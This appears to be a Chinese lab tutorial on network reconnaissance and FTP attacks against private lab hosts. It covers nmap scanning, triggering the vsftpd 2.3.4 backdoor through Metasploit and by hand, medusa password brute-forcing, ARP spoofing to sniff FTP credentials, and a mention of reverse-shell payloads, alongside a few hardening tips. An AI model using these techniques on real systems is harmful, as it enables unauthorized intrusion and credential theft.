端口的分类 端口范围 0-65535
tcp端口和UDP端口 ,由于TCP和UDP两个协议是独立的,因此各自的端口号也是互相独立的,比如 TCP有235端口,UDP也可以有235端口,两者并不冲突
端口分为
1 周知端口 是总所周知的端口号,范围是从0到1023 其中80端口分给www服务,21给ftp服务等,我们在IE输入的地址栏不用输入指定端口号的额,因为在默认情况下WWW服务的端口是 “80”
2 动态端口 范围是从49152到65535 之所以称为动态端口,是因为它一般不固定,分配某种服务,而是动态分配
3 注册端口
端口1024到49151 ,分配给用户进程或应用程序的,这些进程主要是用户安装的程序
端口 Banner 获取 -nmap 使用Namp 指定主机的端口信息 并返回Banner
nmap IP地址 --script banner -p 端口号
root@kali:~# nmap localhost -p 22 --script banner
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-04-26 23:45 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00017s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
2 dmitry -pb IP地址
root@kali:~# dmitry -pb 192.168.43.62
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host Name for 192.168.43.62
Continuing with limited modules
HostIP:192.168.43.62
HostName:
Gathered TCP Port information for 192.168.43.62
---------------------------------
Port State
22/tcp open
>> SSH-2.0-OpenSSH_7.4
111/tcp open
3 使用netcat获取Banner 信息
-nc -vn IP地址 端口号
也可以使用nmap IP地址 --script banner -p 20-30
也可以使用nmap IP地址 --script banner -p 20-30
端口服务版本信息 获取
利用Nmap 获取目标版本信息 的端口版本信息
nmap -p 端口号 -sV IP地址
首先使用这个来测试
root@kali:~# nmap --script banner 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:24 CST
Nmap scan report for 192.168.43.63
Host is up (0.00031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.4
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds
root@kali:~# nmap -sV 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:27 CST
Nmap scan report for 192.168.43.63
Host is up (0.00019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 对应的版本信息
111/tcp open rpcbind 2-4 (RPC #100000)
6000/tcp open X11 (access denied)
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Service Info: OS: Unix
操作系统版本信息获取
使用Namp 扫描指定主机的操作系统
nmap -O IP地址
root@kali:~# nmap -O 192.168.43.99
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:44 CST
Nmap scan report for 192.168.43.99
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh 打开的端口
Device type: general purpose
Running: Linux 3.X 正在跑的系统试linux
OS CPE: cpe:/o:linux:linux_kernel:3 操作系统的内核
OS details: Linux 3.7 - 3.18
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.32 seconds
操作系统版本信息获取
在针对内容测试时,有授权的情况下,可以利用nmap 对目标急性完整的测试
nmap -A -v IP地址
nmap -A -v -T4 IP地址
root@kali:~# nmap -A -v -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 21:52 CST
NSE: Loaded 122 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating ARP Ping Scan at 21:52
Scanning 192.168.43.63 [1 port]
Completed ARP Ping Scan at 21:52, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:52
Completed Parallel DNS resolution of 1 host. at 21:52, 0.07s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.43.63 [1000 ports]
Discovered open port 111/tcp on 192.168.43.63
Discovered open port 22/tcp on 192.168.43.63
Discovered open port 6000/tcp on 192.168.43.63
Completed SYN Stealth Scan at 21:52, 1.45s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 3 services on 192.168.43.63
Completed Service scan at 21:52, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.63
NSE: Script scanning 192.168.43.63.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.90s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.43.63
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 bf:c0:28:65:3e:ff:7f:fc:49:d1:05:c3:76:83:90:09 (RSA)
|_ 256 58:06:c2:6f:b6:4c:8d:d9:43:7d:91:85:08:4a:ed:0e (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
|_ 100000 2,3,4 111/udp rpcbind
6000/tcp open X11 (access denied)
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.018 days (since Tue May 4 21:26:37 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.43.63
NSE: Script Post-scanning.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
Raw packets sent: 1130 (52.200KB) | Rcvd: 1120 (47.212KB)
漏洞扫描原理
漏洞扫描对漏洞进行,以验证具体目标是否对应的具体漏洞,但是也存在错误扫描,需要对扫描结果进行漏洞验证
其实扫描器的原理大致相同都是通过发送对应的验证数据目标具体服务进行验证,当收到目标返回的响应与存在漏洞的响应一致时,就表明粗在漏洞
首先是安装一个vsftpd2.3.4 版本的ftp
wget http://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz
如果系统已经安装vsftpd,删除它
------------------------------------------------
Mkdir /usr/share/empty
Useradd -s /sbin/nologin -d /var/ftp ftp
Useradd nobody
chown root:root /var/ftp
chmod og-w /var/ftp
#上为安装前准备
-------------------------------------------------
tar zxvf vsftpd-2.3.4.tar.gz
#解压
cd vsftpd-2.3.4
#进入目录
Cat 下builddefs.h 文件,看它默认都启用了什么功能,更具体的可以more INSTALL(查看帮助文件)
undef 为不启用
Define为启用
#ifndef VSF_BUILDDEFS_H
#define VSF_BUILDDEFS_H
#define VSF_BUILD_TCPWRAPPERS
#define VSF_BUILD_PAM
#undef VSF_BUILD_SSL
#endif /* VSF_BUILDDEFS_H */
-----------------------------------------
#编码解决步骤
Vi opts.c
if (str_equal_text(&p_sess->ftp_arg_str,"UTF8 ON")) 更改成
if (str_equal_text(&p_sess->ftp_arg_str,"DISABLE UTF8 ON"))
注意:安装之前,如果系统为64位,需要更改vsf_findlibs.sh文件库中lib 路径,命令如下:
sed -i 's/lib\//lib64\//g' vsf_findlibs.sh
----------------------------------------------
到这里,我们可以编译安装了
Make && make install
进程中没有提示什么错误信息,表示已经成功安装
接下来需要复制些文件
cp vsftpd.conf /etc #配置主文件
cp RedHat/vsftpd.pam /etc/pam.d/ftp #PAM 认证文件
--------------------------------
启动vsftpd
/usr/local/sbin/vsftpd &
查看下
netstat -tnl | grep 21
漏洞扫描工具, nmap 也可以进行漏洞扫描
nmap --script vuln 目标IP地址
也可以加上-T4 来扫描
root@kali:~# nmap --script vuln -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 22:04 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.43.63
Host is up (0.0031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.69 seconds
root@kali:~# nmap --script vuln -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 22:04 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.43.63
Host is up (0.0031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.69 seconds
root@kali:~# nmap --script vuln -T4 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-04 22:04 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.43.63
Host is up (0.0031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 36.69 seconds
二 、 下面是使用美少妇的来扫描
在这里我们进入到msf 查看vsftpd
msf > search vsftpd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
msf >
msf >
msf >
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 192.168.43.80
rhost => 192.168.43.80
msf exploit(vsftpd_234_backdoor) > set rport 21
rport => 21
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set rhost 192.168.43.80
rhost => 192.168.43.80
msf exploit(vsftpd_234_backdoor) > set rport 21
rport => 21
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 Microsoft FTP Service
[*] USER: 331 Password required
web应用程序漏洞扫描
针对应用程序的漏洞扫描其实就是每隔扫描器读取自己的Payload 进行探测
1 Owasp-zap 2 AWVS 3Appscan 4 Nikto Burpsuite 每个扫描器都有各自不同的Payload 进行探测
OWASP -ZAP是OWASP组织发的用于web应用层序漏洞扫描器 免费开源,不断更新维护
nikto -host IP地址 对目标服务器进行漏洞扫描, 主要针对HTTP服务器
1 ftp协议介绍
ftp协议介绍 文件传输协议,是用于在网络上进行文件传输的一套标准协议,使用客户服务模式,它属于网络传输协议的应用层,ftp 使用21 端口
用户分类
1 Real用户 2 Administrator 3 匿名用户 anonymous 默认开启匿名用户模式
ftp 文件传输格式
1 ASCII 2 二进制格式
利用ftp 匿名登录漏洞
由于ftp 没有禁止匿名用户,所以可以直接使用Anonymous 用户直接登录ftp 服务器
使用nc 连接ftp
① 步骤如下
首先是使用nmap 来扫描21端口是否开放
root@kali:~# nmap -p 21 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 20:48 CST
Nmap scan report for 192.168.43.63
Host is up (0.00063s latency).
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.99 seconds
② 使用nmap 的脚本来扫描
nmap --script vuln -p 21 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 20:48 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 192.168.43.99
| 192.168.43.63
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
③使用nc 来连接
root@kali:~# nc 192.168.43.63 21
220 (vsFTPd 2.3.4)
USER anonymous 输入匿名的用户
331 Please specify the password.
PASS 123输入密码
230 Login successful. 可以看到我们已经成功登录
help
214-The following commands are recognized.
ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
XPWD XRMD
214 Help OK.
pwd
257 "/"
421 Timeout.
利用FTP后门漏洞
vsftpd 手工出发漏洞,当进行FTP认证时,如果用户USER 中包含:) ,那么直接触发监听6200 端口的连接的shell
FTP 安全设置
①首先还是先使用nmap 来烧苗靶机的6200 端口是否开放
root@kali:~# nmap 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 21:04 CST
Nmap scan report for 192.168.43.63
Host is up (0.00030s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
111/tcp open rpcbind
6000/tcp open X11
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
在以上我们可以看出6200 的端口没有开放
②然后我们使用 nc 进行连接
root@kali:~# nc 192.168.43.63 21
220 (vsFTPd 2.3.4)
USER user:)
530 This FTP server is anonymous only.
PASS 123
421 Timeout.th USER first.可以看出我们的服务职能是匿名登录
③在此使用nc 连接靶机的6200端口
root@kali:~# nc 192.168.43.63 6200
(UNKNOWN) [192.168.43.63] 6200 (?) : Connection refused 6200的端口还是没打开
正常的情况下是6200端口打开
root@kali:~# nmap -p 6200 192.168.43.63
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2021-05-16 21:12 CST
Nmap scan report for 192.168.43.63
Host is up (0.00056s latency).
PORT STATE SERVICE
6200/tcp closed unknown
MAC Address: 00:0C:29:A2:E2:D2 (VMware)
④
⑤
1 修改配置文件,禁止匿名用户登录
2 对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口
iptables -A INPUT -p tcp -dport 6200 -j DROP
iptables -A OUTPUT -p tcp sport 6200 -j DROP
ftp 用户名密码暴力破解
Windows 下cmd命令添加用户名,以及提升Administrator 管理员权限
1) net user 用户名 用户密码 / add
net localgroup administrators admin /add
在ftp下的目录点击右键属性 添加刚才的admin用户
2 ) 可以发现我们在kali 的终端下我们可以使用nc 来登录
root@kali:~# nc 192.168.43.70 21
220 Microsoft FTP Service
USER admin 输入server2003 的用户名
331 Password required for admin.
PASS admin server2003 的密码
230 User admin logged in.
421 Timeout (120 seconds): closing control connection.
421 Terminating connection.
使用 medusa暴力破解ftp登录
语法是
medusa -h 192.168.43.70 -u admin -P pass.txt -M ftp pass.txt 是密码字典 密码字典的路径写绝对路径 先把pass.txt 里面的密码写好
root@kali:~# medusa -h 192.168.43.70 -u admin -P /root/pass.txt -M ftp
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: dlafsl (1 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadfk (2 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadlfksad (3 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: wqerin (4 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadfnlsad (5 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: asdfnaslf (6 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: wqefpwnsd (7 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: saldfnsa (8 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: naflsdfnsladf (9 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: sadf a (10 of 13 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.43.70 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (11 of 13 complete)
ACCOUNT FOUND: [ftp] Host: 192.168.43.70 User: admin Password: admin [SUCCESS] 最后这里我们可以看到用户名和密码
FTP用户明文密码验证
FTP 协议中用户用户认证的过程中,客户端与服务端是通过明文进行交互信息,验证FTP登录过程中明文输入用户名和密码
1 ) 手下打开wireshark 输入 ftp 查看到server2003的用户名和密码
首先使用ifconfig 查看kali 的网卡是eth0 DE网卡
使用arpspoof 来做arp 欺骗
root@kali:~# arpspoof -i eth0 192.168.43.1 网关-t 192.168.43.80 物理机的IP地址
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
0:c:29:f3:6e:61 c:54:15:80:86:85 0806 42: arp reply 192.168.43.1 is-at 0:c:29:f3:6e:61
2 ) 打开物理机80 的cmd
C:\Users\23662>arp -a
接口: 192.168.56.1 --- 0x6
Internet 地址 物理地址 类型
192.168.56.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
接口: 192.168.20.1 --- 0xf
Internet 地址 物理地址 类型
192.168.20.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静
查看网关的物理地址
然后使用ftp的命令登录server2003的ftp 服务器
C:\Users\23662>ftp 192.168.43.70
连接到 192.168.43.70。
220 Microsoft FTP Service
530 Please login with USER and PASS.
用户(192.168.43.70:(none)): admin 输入用户名
331 Password required for admin.
密码: admin 输入密码
230 User admin logged in.
ftp> 成功登录
4 登录ftp 成功后做的事情
利用metaslpoit 创建反弹shell上传到FTP服务器,可以利用setoolkit 快速生成反弹shell
cd 到 .set 的 目录找到palyload.exe
浙公网安备 33010602011771号